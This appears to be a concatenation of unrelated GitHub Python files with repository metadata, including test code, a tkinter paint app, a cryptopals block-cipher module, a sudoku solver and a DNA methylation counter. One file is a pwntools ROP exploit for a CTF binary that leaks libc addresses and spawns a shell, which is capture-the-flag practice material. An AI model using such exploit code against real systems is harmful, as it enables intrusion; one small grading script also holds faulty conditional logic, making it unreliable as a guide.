client = Client(account_sid, auth_token)
message = client.messages \
.create(
body=f'{STOCK}: {up_down}{percent_change}%\nHeadline: {news_title_list[i]}\nBrief: {news_description_list[i]}',
from_='+19257226085',
to='+15551234567'
)
|
mgardner1011/UdemyProjects
|
Stock_news_alert/main.py
|
main.py
|
py
| 2,383 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42896269372
|
import jax
import numpy as np
import numpy.testing as npt
import pytest
from matplotlib import pyplot as plt
from statsmodels.graphics.tsaplots import plot_acf
from .common import GaussianDistribution, FlatPotential, FlatUnivariatePotential, GaussianDynamics, lgssm_data, \
GaussianObservationPotential
from ..csmc import get_kernel
@pytest.fixture(scope="module", autouse=True)
def jax_config():
jax.config.update("jax_platform_name", "cpu")
@pytest.mark.parametrize("backward", [True, False])
def test_flat_potential(backward):
# Test a flat potential, to check that we recover the prior.
# The model is a stationary AR process with Gaussian noise.
JAX_KEY = jax.random.PRNGKey(0)
T = 5 # T time steps
RHO = 0.9 # correlation
N = 32 # use N particles in total
M = 50_000 # get M - B samples from the particle Gibbs kernel
B = M // 10 # Discard the first 10% of the samples
M0 = GaussianDistribution(mu=0.0, sig=1.0)
G0 = FlatUnivariatePotential()
Gt = FlatPotential()
Mt = GaussianDynamics(rho=RHO)
init, kernel = get_kernel(M0, G0, Mt, Gt, N=N, backward=backward, Pt=Mt)
init_key, key = jax.random.split(JAX_KEY)
x0 = jax.random.normal(init_key, (T, 1))
init_state = init(x0)
def body(state, curr_key):
state = kernel(curr_key, state)
return state, (state.x, state.updated)
_, (xs, ancestors) = jax.lax.scan(body, init_state, jax.random.split(key, M))
xs = xs[B:, :, 0]
fig, axes = plt.subplots(ncols=2, figsize=(10, 5))
fig.suptitle("Backward: {}".format(backward))
plot_acf(xs[:, 0], ax=axes[0])
axes[0].set_title("ACF of x_0")
plot_acf(xs[:, T // 2], ax=axes[1])
axes[1].set_title("ACF of x_T/2")
plt.show()
atol = 0.05
cov = np.cov(xs, rowvar=False)
cov = np.atleast_2d(cov)
rows, cols = np.diag_indices_from(cov)
cov_diag = cov[rows, cols] # marginal variances
sub_cov_diag = cov[rows[:-1], cols[1:]] # Covariances between adjacent time steps
npt.assert_allclose(xs.mean(axis=0), 0., atol=atol)
npt.assert_allclose(cov_diag, 1., atol=atol)
npt.assert_allclose(sub_cov_diag, RHO, atol=atol)
@pytest.mark.parametrize("backward", [True, False])
def test_lgssm(backward):
# Test a LGSSM model test
JAX_KEY = jax.random.PRNGKey(0)
T = 25 # T time steps
RHO = 0.9 # correlation
SIG_Y = 0.1 # observation noise
data_key, init_key, key = jax.random.split(JAX_KEY, 3)
true_xs, true_ys = lgssm_data(data_key, RHO, SIG_Y, T)
N = 32 # use N particles in total
M = 50_000 # get M - B samples from the particle Gibbs kernel
B = M // 10 # Discard the first 10% of the samples
M0 = GaussianDistribution(mu=0.0, sig=1.0)
G0 = GaussianDistribution(mu=true_ys[0], sig=SIG_Y)
Gt = GaussianObservationPotential(params=true_ys[1:], sig=SIG_Y)
Mt = GaussianDynamics(rho=RHO)
init, kernel = get_kernel(M0, G0, Mt, Gt, N=N, backward=backward, Pt=Mt)
x0 = jax.random.normal(init_key, (T, 1))
init_state = init(x0)
def body(state, curr_key):
state = kernel(curr_key, state)
return state, (state.x, state.updated)
_, (xs, ancestors) = jax.lax.scan(body, init_state, jax.random.split(key, M))
xs = xs[B:, :, 0]
fig, axes = plt.subplots(ncols=3, figsize=(15, 5))
fig.suptitle("Backward: {}".format(backward))
plot_acf(xs[:, 0], ax=axes[0])
axes[0].set_title("ACF of x_0")
plot_acf(xs[:, T // 2], ax=axes[1])
axes[1].set_title("ACF of x_T/2")
plot_acf(xs[:, -1], ax=axes[2])
axes[2].set_title("ACF of x_T")
plt.show()
print(xs.mean(axis=0))
print(xs.std(axis=0))
|
AdrienCorenflos/aux-ssm-samplers
|
aux_samplers/_primitives/test_csmc/test_csmc.py
|
test_csmc.py
|
py
| 3,688 |
python
|
en
|
code
| 7 |
github-code
|
6
|
25467673406
|
import tkinter as tk
import message
class Scribble:
def on_pressed(self, event):
self.sx = event.x
self.sy = event.y
self.canvas.create_oval(self.sx, self.sy, event.x, event.y,
outline = self.color.get(),
width = self.width.get())
def on_dragged(self, event):
self.canvas.create_line(self.sx, self.sy, event.x, event.y,
fill = self.color.get(),
width = self.width.get())
self.sx = event.x
self.sy = event.y
def create_window(self):
window = tk.Tk()
window.title('Painterz')
self.canvas = tk.Canvas(window, bg = "white", width = 600, height = 300)
self.canvas.pack()
menu = tk.Menu(window)
window.config(menu=menu)
filemenu = tk.Menu(menu)
menu.add_cascade(label="File", menu=filemenu)
filemenu.add_command(label="New", command=message.callback)
filemenu.add_command(label="Open...", command=message.callback)
filemenu.add_separator()
filemenu.add_command(label="Exit", command=message.callback)
helpmenu = tk.Menu(menu)
menu.add_cascade(label="Help", menu=helpmenu)
helpmenu.add_command(label="About...", command=message.callback)
quit_button = tk.Button(window, text = "終了", command = window.quit)
quit_button.pack(side = tk.RIGHT)
self.canvas.bind("<ButtonPress-1>", self.on_pressed)
self.canvas.bind("<B1-Motion>", self.on_dragged)
COLORS = ["red", "green", "blue", "#FF00FF", "black"]
self.color = tk.StringVar()
self.color.set(COLORS[1])
b = tk.OptionMenu(window, self.color, *COLORS)
b.pack(side = tk.LEFT)
self.width = tk.Scale(window, from_ = 1, to = 15, orient = tk.HORIZONTAL)
self.width.set(5)
self.width.pack(side = tk.LEFT)
return window;
def __init__(self):
self.window = self.create_window();
def run(self):
self.window.mainloop()
Scribble().run()
|
watachan7/Python_tkinter_painterz
|
src/Painter.py
|
Painter.py
|
py
| 2,232 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27061966352
|
__all__ = [
"InvalidPaddingError",
"find_potential_ecb",
"pad_pkcs_7",
"strip_pkcs_7",
"detect_potential_repeating_ecb_blocks",
"ecb_encrypt",
"cbc_encrypt_prepadded",
"ecb_decrypt",
"cbc_encrypt",
"cbc_decrypt",
"ctr_transcrypt"
]
# noinspection PyPackageRequirements
# false alert, is in requirements as pycryptodome
from Crypto.Cipher import AES
from bitfiddle import brake_into_keysize_blocks
from primitive_crypt import xor_buffers
def detect_potential_repeating_ecb_blocks(ciphertext, blocksize=16):
seen = set()
for block in brake_into_keysize_blocks(ciphertext, blocksize):
if block in seen:
return True
else:
seen.add(block)
return False
def find_potential_ecb(cyphertexts):
for cyphertext in cyphertexts:
if detect_potential_repeating_ecb_blocks(cyphertext):
return cyphertext
return None
def pad_pkcs_7(blob, blocksize):
num_pad_bytes = blocksize - (len(blob) % blocksize)
padding = bytes([num_pad_bytes] * num_pad_bytes)
return blob + padding
class InvalidPaddingError(ValueError):
pass
def strip_pkcs_7(blob):
length = len(blob)
if length == 0:
raise InvalidPaddingError()
num_padding = blob[-1]
if num_padding == 0 or length < num_padding:
raise InvalidPaddingError()
for byte in blob[-num_padding:]:
if byte != num_padding:
raise InvalidPaddingError()
return blob[:-num_padding]
def ecb_encrypt(key, plaintext):
cipher = AES.new(key, AES.MODE_ECB)
input_blob = pad_pkcs_7(plaintext, 16)
return cipher.encrypt(input_blob)
def ecb_decrypt(key, ciphertext):
cipher = AES.new(key, AES.MODE_ECB)
decrypted = cipher.decrypt(ciphertext)
return strip_pkcs_7(decrypted)
def cbc_encrypt_prepadded(key, iv, plaintext):
blocks = brake_into_keysize_blocks(plaintext, 16)
cipher = AES.new(key, AES.MODE_ECB)
def cryptoblocks():
last_block = iv
for block in blocks:
chained = xor_buffers(last_block, block)
last_block = cipher.encrypt(chained)
yield last_block
return b''.join([cb for cb in cryptoblocks()])
def cbc_encrypt(key, iv, plaintext):
return cbc_encrypt_prepadded(key, iv, pad_pkcs_7(plaintext, 16))
def cbc_decrypt(key, iv, ciphertext):
assert len(ciphertext) % 16 == 0
blocks = brake_into_keysize_blocks(ciphertext, 16)
cipher = AES.new(key, AES.MODE_ECB)
def plainblocks():
last_block = iv
for block in blocks:
decrypted_block = cipher.decrypt(block)
plain_block = xor_buffers(last_block, decrypted_block)
last_block = block
yield plain_block
return strip_pkcs_7(b''.join(pb for pb in plainblocks()))
def ctr_keystream(key, nonce, block_count):
if nonce < 0 or nonce > 2**64 or block_count < 0 or block_count > 2**64:
raise ValueError()
plain_nonce = nonce.to_bytes(8, byteorder="little", signed=False)
plain_count = block_count.to_bytes(8, byteorder="little", signed=False)
plain = plain_nonce + plain_count
cipher = AES.new(key, AES.MODE_ECB)
return cipher.encrypt(plain)
def ctr_transcrypt(key, nonce, data):
instream = brake_into_keysize_blocks(data, 16)
num_blocks = len(instream)
if num_blocks == 0:
return b''
keystream = [ctr_keystream(key, nonce, i) for i in range(num_blocks)]
keystream[-1] = keystream[-1][:len(instream[-1])]
outstream = [xor_buffers(instream[i], keystream[i])
for i in range(num_blocks)]
return b''.join(outstream)
|
BrendanCoughlan/cryptopals
|
block_crypt.py
|
block_crypt.py
|
py
| 3,652 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42965233010
|
# *args = parameter that will pack all arguments into a tuple. Useful for the function to be more flexible thing varying amount of arguments.
# def add(num1, num2):
# sum = num1 + num2
# return sum
# print(add(1,2,3)) #no longer can use this if the parameter is more than 2
def add(*stuff):
sum = 0
stuff = list(stuff)
stuff[0] = 0
for i in stuff:
sum += i
return sum
print(add(1,2,3,4,5,6,7,8,9))
|
Naqiu00/Python-beginner
|
args_parameter.py
|
args_parameter.py
|
py
| 437 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33232976991
|
def find_empty_space(puzzle):
# find an empty space and return -1 if it exists
# this function will return row, col tuple
for i in range(9):
for j in range(9):
if puzzle[i][j] == -1:
return i, j
# if there's no empty space
return None, None
def guess_is_valid(puzzle, guess, row, col):
# this function will return True if guess is valid, else False
row_values = puzzle[row]
if guess in row_values:
return False
# row index will vary but col index will remain same within each row
col_values = []
for x in range(9):
col_values.append(puzzle[x][col])
if guess in col_values:
return False
# to get the start of our 3x3 matrix
row_start = (row // 3) * 3
col_start = (col // 3) * 3
# iterate through the 3 values
for a in range(row_start, row_start + 3):
for b in range(col_start, col_start + 3):
if puzzle[a][b] == guess:
return False
return True
def sudoku_solver(puzzle):
# input is a list of lists
# returns whether a solution exists or not
# choosing an entry point or blank space
row, col = find_empty_space(puzzle)
# edge case - check for either row or col is None (no empty space)
if row is None:
return True
for guess in range(1, 10):
if guess_is_valid(puzzle, guess, row, col):
# if guess is valid, place it on the puzzle
puzzle[row][col] = guess
# recursive call
if sudoku_solver(puzzle):
return True
# if guess is incorrect, then backtrack and try again
# reset the guess to empty space i.e. -1
puzzle[row][col] = -1
# if no guess is correct, then provided puzzle can't be solved and return False
return False
if __name__ == '__main__':
sample_puzzle = [
[3, 9, -1, -1, 5, -1, -1, -1, -1],
[-1, -1, -1, 2, -1, -1, -1, -1, 5],
[-1, -1, -1, 7, 1, 9, -1, 8, -1],
[-1, 5, -1, -1, 6, 8, -1, -1, -1],
[2, -1, 6, -1, -1, 3, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, 4],
[5, -1, -1, -1, -1, -1, -1, -1, -1],
[6, 7, -1, 1, -1, 5, -1, 4, -1],
[1, -1, 9, -1, -1, -1, 2, -1, -1]
]
print(sudoku_solver(sample_puzzle))
print(sample_puzzle)
|
Nikhil-Pachpande/sudoku-solver
|
sudoku.py
|
sudoku.py
|
py
| 2,505 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21845001985
|
math = int(input("Enter math rate: "))
physics = int(input("Enter physics rate: "))
geography = int(input("Enter geography rate: "))
history = int(input("Enter history rate: "))
geometry = int(input("Enter geometry rate: "))
result = math + physics + geography + history + geometry
if result <= 40:
print("Fail")
elif result >= 41 or result <= 60:
print("Satisfactory")
elif result >= 61 or result <= 80:
print("Good")
elif result >= 81 or result <= 100:
print("Outstanding")
else:
print("Something went wrong with this input")
|
Areg14/DroneEduLab
|
Lesson5/Problem2.py
|
Problem2.py
|
py
| 550 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70063592188
|
from pwn import *
from LibcSearcher import *
# p=remote('61.147.171.105',51339)
p=process('./whoami')
elf=ELF('./whoami')
#libc=ELF('./libc-2.27.so')
# libc=ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('/home/cutecabbage/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6')
rl = lambda a=False : p.recvline(a)
ru = lambda a=True : p.recvuntil(a)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
#rdi, rsi, rdx, rcx,
bss_addr=0x601040
buf_addr1=bss_addr+0xc0
buf_addr2=bss_addr+0x70
buf_addr3=bss_addr+0x308
main_addr=0x0000000000400771
pop_rbp=0x0000000000400648
pop_rdi=0x0000000000400843
pop_rsi_r15=0x0000000000400841
puts_plt=elf.plt['puts']
read_plt=elf.plt['read']
puts_got=elf.got['puts']
read_got=elf.got['read']
read_0x70=0x00000000004007BB
leave_ret=0x00000000004007d6
power_rop1=0x000000000040083A
power_rop2=0x0000000000400820
def getpower(avg1,avg2,avg3,plt):
payload=p64(power_rop1)+p64(0)+p64(0)+p64(1)+p64(plt)+p64(avg1)+p64(avg2)+p64(avg3)
payload+=p64(power_rop2)+p64(0)*7
return payload
ru(b'Input name:\n')
payload1=b'a'*0x20+p64(buf_addr1)+p64(leave_ret)
file_path = 'payload1'
with open(file_path, 'wb') as file_obj:
file_obj.write(payload1)
sn(payload1)
ru(b'Else?\n')
payload2=b'b'*0xc0+p64(buf_addr2)
payload2+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(read_0x70)
# payload2=payload2.ljust(240,b'\x00')
file_path = 'payload2'
with open(file_path, 'wb') as file_obj:
file_obj.write(payload2)
sn(payload2)
puts_addr=u64(p.recv().strip().ljust(8,b'\x00'))
print(hex(puts_addr))
# libc=LibcSearcher('read',read_addr)
# print(libc.dump('system'))
# libc=LibcSearcher('read',read_addr)
# libcbase=read_addr-libc.dump('read')
libcbase=puts_addr-libc.symbols['puts']
print('libcbase',hex(libcbase))
# system_addr=libcbase+libc.dump('system')
system_addr=libcbase+libc.symbols['system']
print("system:",hex(system_addr))
pause()
payload3=b'w'*0x70+p64(buf_addr3)
payload3+=p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(buf_addr3)+p64(0)+p64(read_plt)+p64(leave_ret)
# payload3=payload3.ljust(240,b's')
file_path = 'payload3'
with open(file_path, 'wb') as file_obj:
file_obj.write(payload3)
# print(payload3)
sn(payload3)
payload4 = p64(bss_addr+0x400)
payload4 += p64(pop_rdi)
payload4 += p64(bss_addr+0x308+0x20)
payload4 += p64(system_addr)
payload4 += b'/bin/sh\x00'
file_path = 'payload4'
with open(file_path, 'wb') as file_obj:
file_obj.write(payload4)
sl(payload4)
# payload2=b'a'*0x70+p64(buf_addr2)
# payload2+=p64(pop_rdi)+p64(read_got)+p64(puts_plt)+p64(read_0x70)
# sn(payload2)
# print(p.recv())
pause()
p.interactive()
|
CookedMelon/mypwn
|
adworld/whoami/exp-bak.py
|
exp-bak.py
|
py
| 2,967 |
python
|
en
|
code
| 3 |
github-code
|
6
|
10423288883
|
from __future__ import annotations
import pytest
from PySide6.QtCore import Qt
from randovania.game_description.db.configurable_node import ConfigurableNode
from randovania.game_description.db.dock_node import DockNode
from randovania.game_description.db.event_node import EventNode
from randovania.game_description.db.hint_node import HintNode
from randovania.game_description.db.node import GenericNode
from randovania.game_description.db.pickup_node import PickupNode
from randovania.game_description.db.teleporter_network_node import TeleporterNetworkNode
from randovania.gui.dialog.node_details_popup import NodeDetailsPopup
@pytest.mark.parametrize(
"node_type",
[
GenericNode,
DockNode,
PickupNode,
EventNode,
ConfigurableNode,
HintNode,
],
)
def test_unchanged_create_new_node_echoes(skip_qtbot, echoes_game_description, node_type):
node = next(node for node in echoes_game_description.region_list.iterate_nodes() if isinstance(node, node_type))
dialog = NodeDetailsPopup(echoes_game_description, node)
skip_qtbot.addWidget(dialog)
# Run
new_node = dialog.create_new_node()
# Assert
assert node == new_node
@pytest.mark.parametrize(
"node_type",
[
TeleporterNetworkNode,
],
)
def test_unchanged_create_new_node_corruption(skip_qtbot, corruption_game_description, node_type):
node = next(node for node in corruption_game_description.region_list.iterate_nodes() if isinstance(node, node_type))
dialog = NodeDetailsPopup(corruption_game_description, node)
skip_qtbot.addWidget(dialog)
# Run
new_node = dialog.create_new_node()
# Assert
assert node == new_node
def test_change_incompatible_dock_list(skip_qtbot, echoes_game_description):
node = next(node for node in echoes_game_description.region_list.iterate_nodes() if isinstance(node, DockNode))
dialog = NodeDetailsPopup(echoes_game_description, node)
skip_qtbot.addWidget(dialog)
model = dialog.dock_incompatible_model
m = model.index(0)
assert model.data(m, Qt.ItemDataRole.WhatsThisRole) is None
assert model.data(m, Qt.ItemDataRole.DisplayRole) == "New..."
assert model.data(m, Qt.ItemDataRole.EditRole) == ""
assert not model.setData(m, "Normal Door", Qt.ItemDataRole.DisplayRole)
assert model.data(m, Qt.ItemDataRole.DisplayRole) == "New..."
assert model.setData(m, "Normal Door", Qt.ItemDataRole.EditRole)
assert model.data(m, Qt.ItemDataRole.DisplayRole) == "Normal Door"
result = dialog.create_new_node()
assert isinstance(result, DockNode)
assert [w.name for w in result.incompatible_dock_weaknesses] == ["Normal Door"]
assert model.removeRow(0, m)
assert model.data(m, Qt.ItemDataRole.EditRole) == ""
result = dialog.create_new_node()
assert isinstance(result, DockNode)
assert [w.name for w in result.incompatible_dock_weaknesses] == []
def test_on_pickup_index_button_generic(skip_qtbot, echoes_game_description):
node = next(node for node in echoes_game_description.region_list.iterate_nodes() if isinstance(node, GenericNode))
dialog = NodeDetailsPopup(echoes_game_description, node)
skip_qtbot.addWidget(dialog)
dialog.on_pickup_index_button()
assert dialog.pickup_index_spin.value() == 119
def test_on_pickup_index_button_pickup(skip_qtbot, echoes_game_description):
node = next(node for node in echoes_game_description.region_list.iterate_nodes() if isinstance(node, PickupNode))
dialog = NodeDetailsPopup(echoes_game_description, node)
skip_qtbot.addWidget(dialog)
dialog.on_pickup_index_button()
assert dialog.pickup_index_spin.value() == node.pickup_index.index
def test_on_dock_update_name_button(skip_qtbot, blank_game_description):
node = next(node for node in blank_game_description.region_list.iterate_nodes() if isinstance(node, DockNode))
dialog = NodeDetailsPopup(blank_game_description, node)
skip_qtbot.addWidget(dialog)
dialog.name_edit.setText("Weird Name")
# Run
assert dialog.name_edit.text() == "Weird Name"
dialog.on_dock_update_name_button()
assert dialog.name_edit.text() == node.name
|
randovania/randovania
|
test/gui/dialog/test_node_details_popup.py
|
test_node_details_popup.py
|
py
| 4,199 |
python
|
en
|
code
| 165 |
github-code
|
6
|
23935769471
|
import numpy as np
import scipy.sparse as sp
import tensorflow as tf
import gc
import random
from clac_metric import cv_model_evaluate
from utils import *
from model import GCNModel
from opt import Optimizer
def PredictScore(train_drug_dis_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp):
np.random.seed(seed)
tf.reset_default_graph()
tf.set_random_seed(seed)
adj = constructHNet(train_drug_dis_matrix, drug_matrix, dis_matrix)
adj = sp.csr_matrix(adj)
association_nam = train_drug_dis_matrix.sum()
X = constructNet(train_drug_dis_matrix)
features = sparse_to_tuple(sp.csr_matrix(X))
num_features = features[2][1]
features_nonzero = features[1].shape[0]
adj_orig = train_drug_dis_matrix.copy()
adj_orig = sparse_to_tuple(sp.csr_matrix(adj_orig))
adj_norm = preprocess_graph(adj)
adj_nonzero = adj_norm[1].shape[0]
placeholders = {
'features': tf.sparse_placeholder(tf.float32),
'adj': tf.sparse_placeholder(tf.float32),
'adj_orig': tf.sparse_placeholder(tf.float32),
'dropout': tf.placeholder_with_default(0., shape=()),
'adjdp': tf.placeholder_with_default(0., shape=())
}
model = GCNModel(placeholders, num_features, emb_dim,
features_nonzero, adj_nonzero, train_drug_dis_matrix.shape[0], name='LAGCN')
with tf.name_scope('optimizer'):
opt = Optimizer(
preds=model.reconstructions,
labels=tf.reshape(tf.sparse_tensor_to_dense(
placeholders['adj_orig'], validate_indices=False), [-1]),
model=model,
lr=lr, num_u=train_drug_dis_matrix.shape[0], num_v=train_drug_dis_matrix.shape[1], association_nam=association_nam)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for epoch in range(epochs):
feed_dict = dict()
feed_dict.update({placeholders['features']: features})
feed_dict.update({placeholders['adj']: adj_norm})
feed_dict.update({placeholders['adj_orig']: adj_orig})
feed_dict.update({placeholders['dropout']: dp})
feed_dict.update({placeholders['adjdp']: adjdp})
_, avg_cost = sess.run([opt.opt_op, opt.cost], feed_dict=feed_dict)
if epoch % 100 == 0:
feed_dict.update({placeholders['dropout']: 0})
feed_dict.update({placeholders['adjdp']: 0})
res = sess.run(model.reconstructions, feed_dict=feed_dict)
print("Epoch:", '%04d' % (epoch + 1),
"train_loss=", "{:.5f}".format(avg_cost))
print('Optimization Finished!')
feed_dict.update({placeholders['dropout']: 0})
feed_dict.update({placeholders['adjdp']: 0})
res = sess.run(model.reconstructions, feed_dict=feed_dict)
sess.close()
return res
def cross_validation_experiment(drug_dis_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp):
index_matrix = np.mat(np.where(drug_dis_matrix == 1))
association_nam = index_matrix.shape[1]
random_index = index_matrix.T.tolist()
random.seed(seed)
random.shuffle(random_index)
k_folds = 5
CV_size = int(association_nam / k_folds)
temp = np.array(random_index[:association_nam - association_nam %
k_folds]).reshape(k_folds, CV_size, -1).tolist()
temp[k_folds - 1] = temp[k_folds - 1] + \
random_index[association_nam - association_nam % k_folds:]
random_index = temp
metric = np.zeros((1, 7))
print("seed=%d, evaluating drug-disease...." % (seed))
for k in range(k_folds):
print("------this is %dth cross validation------" % (k+1))
train_matrix = np.matrix(drug_dis_matrix, copy=True)
train_matrix[tuple(np.array(random_index[k]).T)] = 0
drug_len = drug_dis_matrix.shape[0]
dis_len = drug_dis_matrix.shape[1]
drug_disease_res = PredictScore(
train_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp)
predict_y_proba = drug_disease_res.reshape(drug_len, dis_len)
metric_tmp = cv_model_evaluate(
drug_dis_matrix, predict_y_proba, train_matrix)
print(metric_tmp)
metric += metric_tmp
del train_matrix
gc.collect()
print(metric / k_folds)
metric = np.array(metric / k_folds)
return metric
if __name__ == "__main__":
drug_sim = np.loadtxt('../data/drug_sim.csv', delimiter=',')
dis_sim = np.loadtxt('../data/dis_sim.csv', delimiter=',')
drug_dis_matrix = np.loadtxt('../data/drug_dis.csv', delimiter=',')
epoch = 4000
emb_dim = 64
lr = 0.01
adjdp = 0.6
dp = 0.4
simw = 6
result = np.zeros((1, 7), float)
average_result = np.zeros((1, 7), float)
circle_time = 1
for i in range(circle_time):
result += cross_validation_experiment(
drug_dis_matrix, drug_sim*simw, dis_sim*simw, i, epoch, emb_dim, dp, lr, adjdp)
average_result = result / circle_time
print(average_result)
|
storyandwine/LAGCN
|
code/main.py
|
main.py
|
py
| 5,019 |
python
|
en
|
code
| 45 |
github-code
|
6
|
72331827389
|
import csv
class Node:
def __init__(self, name):
self.name = name
self.links = []
self.visited = False
class Link:
def __init__(self, fromNode, toNode, cost):
self.cost = cost
self.nodes = [fromNode, toNode]
class Graph:
def __init__(self, fileName):
self.nodes = {}
with open(fileName, 'r', encoding='utf-8') as csvfile:
reader = csv.reader(csvfile, delimiter=' ')
i = 0
for row in reader:
i += 1
if i == 1:
self.V = int(row[0])
elif i == 2:
self.E = int(row[0])
if len(row) == 2:
self.add_edge(int(row[0]), int(row[1]))
def add_edge(self, fromNodeKey, toNodeKey):
if not self.nodes.get(fromNodeKey):
self.nodes[fromNodeKey] = Node(fromNodeKey)
if not self.nodes.get(toNodeKey):
self.nodes[toNodeKey] = Node(toNodeKey)
fromNode = self.nodes[fromNodeKey]
toNode = self.nodes[toNodeKey]
link = Link(fromNode, toNode, 1)
self.nodes[fromNodeKey].links.append(link)
def print(self):
for k, v in self.nodes.items():
print(k, v.links)
if __name__ == '__main__':
foo = Graph("tinyG.txt")
foo.print()
|
cdfmlr/Graph_Python
|
graph_class.py
|
graph_class.py
|
py
| 1,343 |
python
|
en
|
code
| 1 |
github-code
|
6
|
36010802868
|
# -*- coding: cp1252 -*-
import arcpy
#-------- Update les ID_Support pour que les valeurs puissent etre unique
def update_IDSupport(in_table, sqlClause):
fields=("ID_Support")
workspace = 'F:/Douala/Data_gathering/Gathring.gdb'
# Open an edit session and start an edit operation
with arcpy.da.Editor(workspace) as edit:
cursor = arcpy.da.UpdateCursor(in_table, fields, sqlClause)
cpt=1
newVal = ""
for row in cursor:
if len(str(cpt))==1:
newVal = row[0] + "000" + str(cpt)
elif len(str(cpt))==2:
newVal = row[0] + "00" + str(cpt)
elif len(str(cpt))==3:
newVal = row[0] + "0" + str(cpt)
elif len(str(cpt))==4:
newVal = row[0] + str(cpt)
print("Old value = " + str(row[0]))
row[0]=newVal
print("New value = " + newVal)
print("Starting data update ...")
cursor.updateRow(row)
print("Update done ...")
cpt+=1
print("Rows updated = " + str(cpt))
update_IDSupport(r'F:/Douala/Data_gathering/Gathring.gdb/Supports', "ID_Support like '8221307%'")
##print("Lancement du tri")
##arcpy.Sort_management("BT_Model_Project/Supports", "Supports_Sort", [["Date_Visite", "ASCENDING"]])
##print("Fin du tri")
|
Diffouo/Python-Data-Analysis
|
Update_IDSupport.py
|
Update_IDSupport.py
|
py
| 1,402 |
python
|
en
|
code
| 1 |
github-code
|
6
|
9470821711
|
#! /usr/bin/python3
import re
total_c_in_C_count = 0
total_1_c_in_C_count = 0
total_c_in_gene = 0
total_1_c_in_gene = 0
total_c_in_intergenic = 0
total_c_in_exon = 0
total_c_in_intron = 0
total_c_in_UTR = 0
total_meth_count = 0
gene_meth_count = 0
intergenic_meth_count = 0
exon_meth_count = 0
intron_meth_count = 0
UTR_meth_count = 0
ambig_meth_count = 0
matched_genes = set()
matched_genes_1 = set()
matched_genes_6 = set()
with open('/path/to/dir/C_all_contexts_methylation_counts_ambig.txt', 'r') as inp:
for rawline in inp:
if rawline[0] not in ('#','\n'):
line = rawline.strip().split('\t')
scaff = line[0]
position = int(line[1])
meth_perc = float(line[2])
reads_meth = int(line[3])
reads_unmeth = int(line[4])
if len(line) > 5:
annot = line[5]
else:
annot = ''
if len(line) > 6:
gid = str(line[6])
else:
gid = ''
if (reads_meth + reads_unmeth) >= 1:
matched_genes_1.add(gid)
total_1_c_in_C_count += 1
if re.search('mRNA', annot):
total_1_c_in_gene += 1
if (reads_meth + reads_unmeth) >= 6:
matched_genes_6.add(gid)
if (reads_meth + reads_unmeth) >= 10:
matched_genes.add(gid)
total_c_in_C_count += 1
if re.search('mRNA', annot):
total_c_in_gene += 1
if re.search('CDS', annot):
total_c_in_exon += 1
elif re.search('intron', annot):
total_c_in_intron += 1
elif re.search('UTR', annot):
total_c_in_UTR += 1
else:
total_c_in_intergenic += 1
if (reads_meth + reads_unmeth) >= 10 and meth_perc >= 10.0 and reads_meth >= 5:
if re.search('mRNA', annot):
gene_meth_count += 1
total_meth_count += 1
if re.search('CDS', annot):
exon_meth_count += 1
elif re.search('intron', annot):
intron_meth_count += 1
elif re.search('UTR', annot):
UTR_meth_count += 1
elif re.search('ambiguous', annot):
ambig_meth_count += 1
else:
intergenic_meth_count += 1
total_meth_count += 1
matched_genes.remove('')
overall_meth_perc = float(float(total_meth_count)/float(total_c_in_C_count))*100
cpg_in_gene_meth_perc = float(float(gene_meth_count)/float(total_c_in_gene))*100
cpg_in_intergene_meth_perc = float(float(intergenic_meth_count)/float(total_c_in_intergenic))*100
gene_meth_perc = float(float(gene_meth_count)/float(total_meth_count))*100
intergene_meth_perc = float(float(intergenic_meth_count)/float(total_meth_count))*100
cpg_in_exon_perc = float(float(exon_meth_count)/float(total_c_in_exon))*100
cpg_in_intron_perc = float(float(intron_meth_count)/float(total_c_in_intron))*100
cpg_in_utr_perc = float(float(UTR_meth_count)/float(total_c_in_UTR))*100
exon_meth_perc = float(float(exon_meth_count)/float(gene_meth_count))*100
intron_meth_perc = float(float(intron_meth_count)/float(gene_meth_count))*100
utr_meth_perc = float(float(UTR_meth_count)/float(gene_meth_count))*100
ambig_meth_perc = float(float(ambig_meth_count)/float(total_c_in_C_count))*100
print('Total mapped genes (>= 10 reads): ', len(matched_genes))
print('Total mapped genes (>= 1 read): ', len(matched_genes_1))
print('Total mapped genes (>= 6 reads): ', len(matched_genes_6))
print('Total mapped Cs over genome with read coverage >= 10: ', total_c_in_C_count)
print('Total mapped Cs in genes with read coverage >= 10: ', total_c_in_gene)
print('Total mapped Cs in genes with read coverage >= 1: ', total_1_c_in_gene)
print('Total mapped Cs in intergenic regions with read coverage >= 10: ', total_c_in_intergenic)
print('Methylated Cs (of total CpGs): ', round(overall_meth_perc, 2), '%\n')
print('Methylated Cs in genes (of total CpGs in genes): ', round(cpg_in_gene_meth_perc, 2), '%')
print('Methylated Cs in intergenic regions (of total CpGs in intergenic regions): ', round(cpg_in_intergene_meth_perc, 2), '%\n')
print('Methylated Cs in genes (of total CpGs): ', round(gene_meth_perc, 2), '%')
print('Methylated Cs in intergenic regions (of total CpGs): ', round(intergene_meth_perc, 2), '%\n')
print('Methylated Cs in exons (of total CpGs in exons): ', round(cpg_in_exon_perc, 2), '%')
